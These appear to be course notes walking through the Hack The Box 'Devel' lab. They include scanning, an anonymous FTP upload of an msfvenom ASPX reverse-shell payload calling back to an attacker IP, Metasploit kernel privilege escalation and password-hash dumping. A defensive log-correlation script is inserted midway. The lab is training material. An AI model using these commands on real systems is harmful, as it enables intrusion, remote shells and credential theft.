TCM PEH Hacking Jerry Notes

on under certs

HTB Devel

nmap -T4 -A -p- 10.10.10.5
Noted port 21 open
Noted possible web root dir at port 21 contents
Noted port 80
Noted possible default page at port 80
Noted Windows OS


Visited http://10.10.10.5:80
view source
Noted confirmed default webpage IIS7
dirbuster&
http://10.10.10.5:80
check more threads
/usr/share/wordlists/dirbuster/*small.txt
check directories
check files
check recurse
file extension asm, asmx, asp, aspx, txt, zip, bak, rar
start


cd Desktop
ftp 10.10.10.5
anonymous
anonymous
help
ls
pwd
put dog.jpg
ls
Noted it did copy in dog.jpg


Googled msfvenom, looked for .asp payload format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.14.24
set LPORT 4444
run


ftp 10.10.10.5
anonymous
anonymous
binary
put ex.aspx


http://10.10.10.5/ex.aspx
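The chain above works because anonymous FTP is writable and the FTP root is the IIS web root, so a STOR of an .aspx file followed by a GET for the same path is the whole attack from the server's point of view. The following is an added example (not part of these notes or the course material) of the detection a defender would run over IIS FTP and web logs: it flags anonymous uploads of script-executable files and correlates each one with a later HTTP request for the same path. The log lines are constructed, use a simplified W3C field order stated in the comments (an assumption, real IIS logs declare their fields in a #Fields header), and assume the FTP root and wwwroot coincide so the uri-stems compare directly.

```python
"""Detect anonymous FTP uploads of web-executable files and later HTTP hits on them."""
import os
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine; covers the payload types used in the notes.
SCRIPT_EXTS = {".asp", ".aspx", ".asmx", ".ashx"}

# Constructed sample FTP log (assumed simplified layout):
# date time client-ip user method uri-stem [status]
FTP_LOG = """\
2024-01-01 10:00:01 10.10.14.24 anonymous USER /
2024-01-01 10:00:05 10.10.14.24 anonymous STOR /dog.jpg 226
2024-01-01 10:02:10 10.10.14.24 anonymous STOR /ex.aspx 226
2024-01-01 10:02:11 10.10.14.24 anonymous STOR /notes.txt 226
2024-01-01 10:02:12 10.10.14.24 anonymous STOR /fail.aspx 550
"""

# Constructed sample web log (assumed simplified layout):
# date time client-ip method uri-stem status
WEB_LOG = """\
2024-01-01 10:01:00 10.10.14.24 GET /welcome.png 200
2024-01-01 10:03:00 10.10.14.24 GET /ex.aspx 200
"""


def _ts(date, time_):
    return datetime.fromisoformat(f"{date} {time_}")


def parse_ftp(text):
    """Parse FTP lines into dicts; lines without the minimum fields are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or line.startswith("#"):
            continue
        date, time_, ip, user, method, uri = parts[:6]
        status = parts[6] if len(parts) > 6 else None
        events.append({"ts": _ts(date, time_), "ip": ip, "user": user,
                       "method": method.upper(), "uri": uri, "status": status})
    return events


def parse_web(text):
    """Parse web lines into dicts with the same keys as the FTP events."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or line.startswith("#"):
            continue
        date, time_, ip, method, uri, status = parts[:6]
        events.append({"ts": _ts(date, time_), "ip": ip,
                       "method": method.upper(), "uri": uri, "status": status})
    return events


def find_anonymous_script_uploads(ftp_events):
    """Completed (226) anonymous STORs whose extension IIS would execute."""
    return [e for e in ftp_events
            if e["method"] == "STOR"
            and e["user"].lower() == "anonymous"
            and e["status"] == "226"
            and os.path.splitext(e["uri"])[1].lower() in SCRIPT_EXTS]


def correlate(ftp_events, web_events, window=timedelta(hours=1)):
    """Pair each suspicious upload with HTTP requests for the same path within the window.

    Assumes FTP root == web root, so uri-stems compare directly.
    """
    alerts = []
    for up in find_anonymous_script_uploads(ftp_events):
        for req in web_events:
            same_path = req["uri"].lower() == up["uri"].lower()
            in_window = up["ts"] <= req["ts"] <= up["ts"] + window
            if same_path and in_window:
                alerts.append({"uri": up["uri"], "uploaded_by": up["ip"],
                               "uploaded_at": up["ts"], "requested_by": req["ip"],
                               "requested_at": req["ts"], "http_status": req["status"]})
    return alerts


if __name__ == "__main__":
    for a in correlate(parse_ftp(FTP_LOG), parse_web(WEB_LOG)):
        print(f"ALERT: {a['uri']} uploaded anonymously by {a['uploaded_by']} at "
              f"{a['uploaded_at']}, then requested by {a['requested_by']} "
              f"at {a['requested_at']} (HTTP {a['http_status']})")
```

The upload of dog.jpg and the failed STOR of fail.aspx are deliberately not flagged; only the completed .aspx upload that is later requested over HTTP produces an alert. The fix the alert points at is configuration, not detection: remove anonymous write permission, and keep the FTP root out of any directory IIS serves or at least mark it non-executable.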

In metasploit
sysinfo
getuid
Noted not root
hashdump
getsystem
background
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
exploit
use exploit/windows/local/ms10_015_kitrap0d
options
set session 1
options
exploit
Noted failed, but more options will show now
options
set LHOST 10.10.14.24
set LPORT 4445
exploit
Noted failed because listener died
use exploit/multi/handler
options
run
background
use exploit/windows/local/ms10_015_kitrap0d
set session 2
options
exploit
Noted meterpreter shell
getuid
Noted root
hashdump
